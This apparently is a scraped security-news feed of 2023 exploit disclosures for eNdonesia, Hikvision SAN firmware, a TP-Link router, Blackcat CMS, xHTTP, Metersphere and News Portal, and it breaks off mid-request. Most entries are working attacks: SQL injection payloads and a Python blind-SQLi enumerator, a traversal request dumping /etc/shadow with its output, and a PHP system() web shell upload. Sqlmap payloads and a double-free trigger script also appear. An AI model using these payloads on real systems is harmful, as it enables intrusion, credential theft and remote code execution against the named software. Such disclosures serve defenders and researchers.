SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into "rid" parameter in diskusi.php.

*   Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
*   Date: May 19, 2023
*   Exploit Author: Kunal Khubchandani
*   Vendor Homepage: http://www.endonesia.org/
*   Software Link: https://sourceforge.net/projects/endonesia/
*   Version: 8.7
*   Category: Webapps
*   Tested on: WiN11\_x64/KaLiLinuX\_x64
*   CVE : CVE-2023-31753

#POC:

1.  To exploit this vulnerability, one must send a SQLi sleep payload as a value of "rid" GET Parameter in the following HTTP request.
    
2.  Vulnerable Request:
    

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select\*from(select(sleep(20)))a) HTTP/1.1  
Host: TARGET  
Accept-Encoding: gzip, deflate  
Accept: _/_  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  

3.  Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

\*\* 20 Seconds Delay:

\*\* 30 Seconds Delay:

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

Debian Linux Security Advisory 5456-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5456-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJuly 20, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3727 CVE-2023-3728 CVE-2023-3730 CVE-2023-3732                  CVE-2023-3733 CVE-2023-3734 CVE-2023-3735 CVE-2023-3736                  CVE-2023-3737 CVE-2023-3738 CVE-2023-3740Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 115.0.5790.98-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.0.5790.98-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmS5GUwACgkQEMKTtsN8TjbbTQ/+JTOxjogNUPA3QsV16IWwpWLkSoQkfVxKbreF8i5OC/FRN/nWdvH0gN8ZJI0f9UKhAjaSVAlQ9j4K7L54V4uEXuNWrnNtRDJx24RS6oZ5Wmd301IC0My1qpTRic3vd8Rfc7J9B1lvae9fNAmQlG11X090Pg3nxgaHNWF0qzh4HZcb97rp/TLBmuQLTjnB7jM9y/IBZxKQwoZXGERRWV5UGkp1YtJgNizZhlwkG6MpP6erSFrWOpMokEU44N0WWZKXoZr2xGkc7XIrAumJ5b5+1y+kjCBUVfrnNZl14T+LMz8k45CuDvfCq7FFfDhpS7z/Rrb0SsepBKwzSHB54nmexCLbtkycExwGQ2C5KLNtmjL435V2D65iaCsBdceMtqlGFsGgjZIY2wcYYdSh1lLGqKseoHKGrnSLpwAEuG/Lj+51IQFZ4n1erVCuBbObmWTySoU/cwWmryelWbo9ILiME2y2BwGTYiW1+VGndPBUwG9jgswaFf3Oo9VTSD/olDaD9CbtrnIHS/HrrCLtopDoYqLYcyrQzh++JV5pLkJQD7q90kApBKpw/iI2qVmlHCPUNjAK5AqYS/BDe6XC2rju0+dOyoZ8oSAhzusihLCHhbxYrjpNck8qy+7Zn4XvY5mWXQmfBpf+7o6s5S586Zhd9rsdtgMqBViRWUacSX82Q7I==Hx+R-----END PGP SIGNATURE-----

Debian Security Advisory 5456-1

The PKCS#11 feature in ssh-agent in OpenSSH versions prior to 9.3p2 has an insufficiently trustworthy search path, leading to remote code execution if an agent is forwarded to an attacker-controlled system.

OpenSSH Forwarded SSH-Agent Remote Code Execution

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

TP-Link TL-WR740N suffers from a directory traversal vulnerability.

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal# Date: 13/7/2023# Exploit Author: Anish Feroz (Zeroxinn)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N---------------------------POC---------------------------Request-------GET /help/../../../etc/shadow HTTP/1.1Host: 192.168.0.1:8082Authorization: Basic YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeResponse--------HTTP/1.1 200 OKServer: Router WebserverConnection: closeWWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"Content-Type: text/html<META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><HTML><HEAD><TITLE>TL-WR740N</TITLE><META http-equiv=Pragma content=no-cache><META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"><LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"><SCRIPT language="javascript" type="text/javascript"></SCRIPT>root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::bin::10933:0:99999:7:::daemon::10933:0:99999:7:::adm::10933:0:99999:7:::lp:*:10933:0:99999:7:::sync:*:10933:0:99999:7:::shutdown:*:10933:0:99999:7:::halt:*:10933:0:99999:7:::uucp:*:10933:0:99999:7:::operator:*:10933:0:99999:7:::nobody::10933:0:99999:7:::ap71::10933:0:99999:7:::

TP-Link TL-WR740N Directory Traversal

Blackcat CMS version 1.4 suffers from a remote shell upload vulnerability.

    Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)Application: blackcat CmsVersion: v1.4Bugs:  RCETechnology: PHPVendor URL: https://blackcat-cms.org/Software Link: https://github.com/BlackCatDevelopment/BlackCatCMSDate of found: 13.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?>4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwdPoc requestPOST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1Host: localhostContent-Length: 577Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgrAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0tiConnection: close------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="upload"1------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="userfile"; filename="poc.zip"Content-Type: application/zipPKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a);?>blabalaboalpoc.phpblablabla------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryBRByJwW3CUSHOcBT--

Blackcat CMS 1.4 Shell Upload

xHTTP 72f812d has a double free in close_connection in xhttp.c via a malformed HTTP request method.

Hi!

It appears that xHTTP contains a double free vulnerability in close\_connection at xhttp.c, line 595.

free(conn\->request.public.headers.list);

The double free can be triggered with a malformed HTTP request method. For example, the following python3 script will make a request to the server with a malformed HTTP request method to trigger the double free:

    #!/usr/bin/env python3
    
    import socket
    
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    sock.connect(('localhost', 8080))
    
    http_headers = (
        #Request - http_headers
        b'MALFORMEDMETHOD'*1000  +  # HTTP Method (POST Request).  Sending malformed HTTP Methods invokes a double free in xHTTP
        b' '  
        b'/'  
        b' HTTP/1.0'  
        b'\r\n' 
        b'Host: '  
        b'localhost'  
        b':'  
        b'8080'  
        b'\r\n'  
        b'Accept-Encoding: '  
        b'identity'  
        b'\r\n'  
        b'Content-Type: '  #Content type
        b'application/json'  #JSON content type
        b'\r\n'  
        
        b'Connection: close\r\n'  
        b'User-Agent: '  
        b'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246'  
        b'\r\n'  
    
        b'Content-Length: '  
        b'152'  #Size - Content-Length_size
        b'\r\n'  
        b'\r\n'  #Delim - crlf_headers_body
            #Block - post_body
            b'data=Somepostdata'  
    
    )
    
    sock.send(http_headers)
    sock.recv(65535)
    
    sock.close()
    

To confirm the issue, I first compiled the example server with debug symbols and address sanitizer:

    gcc example.c  xhttp.c -o main -fsanitize=address -g
    

Once the server was compiled, I executed the server on port 8080

**xHTTP Server**

After the server was up and running I saved the python3 script I created from above and executed it, triggering a double free.

**Python3 script****Address Sanitizer Output**

    =================================================================                       
    ==460363==ERROR: AddressSanitizer: attempting double-free on 0x611000000040 in thread T0:
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52
        #1 0x562a5c0a1727 in close_connection /home/kali/projects/fuzzing/xHTTP/xhttp.c:595 
        #2 0x562a5c0a9406 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1749                                                                                                   
        #3 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #4 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58            
        #5 0x7f7cfa846244 in __libc_start_main_impl ../csu/libc-start.c:381                 
        #6 0x562a5c09f420 in _start (/home/kali/projects/fuzzing/xHTTP/main+0x5420)         
                                                                                                                                                                                    
    0x611000000040 is located 0 bytes inside of 256-byte region [0x611000000040,0x611000000140)
    freed by thread T0 here:                                                                
        #0 0x7f7cfaab76a8 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52   
        #1 0x562a5c0a3a4b in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:868            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735           
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37            
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
                                                                                            
    previously allocated by thread T0 here:                                                                                                                                         
        #0 0x7f7cfaab78d5 in __interceptor_realloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:85
        #1 0x562a5c0a2dca in parse /home/kali/projects/fuzzing/xHTTP/xhttp.c:813            
        #2 0x562a5c0a7371 in when_data_is_ready_to_be_read /home/kali/projects/fuzzing/xHTTP/xhttp.c:1459
        #3 0x562a5c0a92e0 in xhttp /home/kali/projects/fuzzing/xHTTP/xhttp.c:1735
        #4 0x562a5c09f693 in main /home/kali/projects/fuzzing/xHTTP/example.c:37
        #5 0x7f7cfa846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: double-free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:52 in __interceptor_free
    
    

A possible fix could be implementing a check to ensure ' conn->request.public.headers.list ' is only freed once.

Thanks!

CVE-2023-38434: Double Free in Commit 72f812d · Issue #1 · cozis/xHTTP

An issue was discovered in the Linux kernel before 6.3.9. ksmbd does not validate the SMB request protocol ID, leading to an out-of-bounds read.

CVE-2023-38430

Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a `belongType` value with a relative path like `../../../../` which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

metersphere 由于只检查了文件名，忘记检查文件类型，导致路径穿越。

**POC**

POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF

1、找到测试用例中的上传附件的按钮  
2、上传一个附件  
3、拦截请求，

POST /track/attachment/testcase/upload HTTP/1.1  
Host: 192.168.213.128:8081  
Content-Length: 381  
Accept-Language: zh-CN  
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Accept: application/json, text/plain, _/_  
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==  
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d  
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de  
Origin: http://192.168.213.128:8081  
Referer: http://192.168.213.128:8081/  
Accept-Encoding: gzip, deflate  
Cookie: \_\_stripe\_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step\_dashboard=true; step\_client\_index=true; privacy-options=6/12/2023|technical|statistical|external  
Connection: close

\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"  
Content-Type: text/plain

tmp2  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="request"; filename="blob"  
Content-Type: application/json

{"belongId":"","belongType":"../../../../../../"}  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7--

4、我们发现修改belongType为../../../../../../就可以达到路径穿越的目的

5 我们看了一下代码，如下，uploadAttachment 检查了BelongType是否等于ISSUE以及TEST\_CASE。如果都不是，就直接在函数saveAttachment中使用BelongType作为文件名的一部分，导致路径穿越。  

**Impact**

任意文件覆盖，甚至可以达到任意代码执行

CVE-2023-37461: metersphere 存在路径穿越漏洞

News Portal version 4.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)# Date: 09/07/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643# Version: 4.0# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example  1-----------------------------------------------------------------------------------------------------------------------Param: name, email, comment-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 277Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:55:26 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 146161<script>alert('comment successfully submit. Comment will be display after admin review ');</script><!DOCTYPE html><html lang="en">  <head>    <meta charset="utf-8">    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">    <meta name="description" content="">    <meta name="author" content="">    <title>News Portal | Home Page  [...]-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/news-details.php?nid=13 HTTP/1.1Origin: http://127.0.0.1Sec-Fetch-User: ?1Host: 127.0.0.1:80Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Accept-Encoding: gzip, deflateSec-Fetch-Site: same-originsec-ch-ua-mobile: ?0Content-Length: 276Sec-Fetch-Mode: navigateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Connection: closeReferer: http://127.0.0.1/newsportal/news-details.php?nid=13Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua-platform: "Windows"Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedsec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Fetch-Dest: documentcsrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 10:56:06 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 525Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21Stack trace:#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w-----------------------------------------------------------------------------------------------------------------------SQLMap example param 'comment':-----------------------------------------------------------------------------------------------------------------------sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:---Parameter: #2* ((custom) POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=    Type: error-based    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=---web application technology: PHP 8.1.17, Apache 2.4.56bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)## Example 2 - login to administration panel-----------------------------------------------------------------------------------------------------------------------Param: username-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 42Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/newsportal/admin/Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8Connection: closeusername=admin'&password=Test%40123&login=-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sun, 09 Jul 2023 11:00:53 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17X-Powered-By: PHP/8.1.17Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 505Connection: closeContent-Type: text/html; charset=UTF-8<br /><b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13Stack trace:#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')#1 {main}  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /newsportal/admin/ HTTP/1.1Host: 127.0.0.1Content-Length: 43Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 